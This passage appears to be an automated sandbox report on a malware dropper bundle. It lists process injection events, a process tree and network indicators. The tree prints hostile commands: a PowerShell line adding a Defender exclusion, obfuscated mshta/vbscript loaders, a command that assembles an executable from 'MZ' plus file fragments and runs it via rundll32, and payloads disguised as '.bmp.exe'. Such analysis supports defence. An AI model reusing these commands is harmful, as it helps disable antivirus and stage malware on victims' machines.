Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue072fdbb8e4b2f5.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe

"C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue072fdbb8e4b2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07ef9e317e0f6ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07a633a94f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07b3bf87d8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07caa83bac5d15.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07267c17f2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07e35cf558.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue070aab9bc86b572.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07816149b72db00.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue071e59dc8292b4ef1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue0750373995e75.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue0741bc096fd881d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue078a285ef7.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07006d6b7c.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue072fdbb8e4b2f5.exe

Tue072fdbb8e4b2f5.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07a633a94f9.exe

Tue07a633a94f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe

Tue07816149b72db00.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 476

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe

Tue070aab9bc86b572.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe

Tue078a285ef7.exe /mixone

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe

Tue07006d6b7c.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe

Tue07267c17f2f5.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe

Tue07caa83bac5d15.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe

Tue071e59dc8292b4ef1.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe

Tue07e35cf558.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe

Tue0741bc096fd881d2.exe

C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp" /SL5="$C0150,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe" ) do taskkill -F -Im "%~nXU"

C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe

SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK

C:\Windows\SysWOW64\taskkill.exe

taskkill -F -Im "Tue07267c17f2f5.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"

C:\Windows\SysWOW64\control.exe

control .\FUEj5.QM

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 336

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe"

Network

Country Destination Domain Proto
N/A 127.0.0.1:49239 tcp
N/A 127.0.0.1:49241 tcp
US 8.8.8.8:53 hsiens.xyz udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.133.1.182:80 tcp
US 8.8.8.8:53 gcl-page.biz udp
US 8.8.8.8:53 www.listincode.com udp
AU 103.224.212.220:443 www.listincode.com tcp
US 8.8.8.8:53 mas.to udp
US 8.8.8.8:53 safialinks.com udp
DE 88.99.75.82:443 mas.to tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 104.110.191.201:80 apps.identrust.com tcp
NL 104.110.191.201:80 apps.identrust.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 best-link-app.com udp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 onepremiumstore.bar udp
US 8.8.8.8:53 premium-s0ftwar3875.bar udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
UA 194.145.227.161:80 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 ipinfo.io udp
FR 91.121.67.60:62102 tcp
US 34.117.59.81:443 ipinfo.io tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 www.iyiqian.com udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
UA 194.145.227.161:80 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
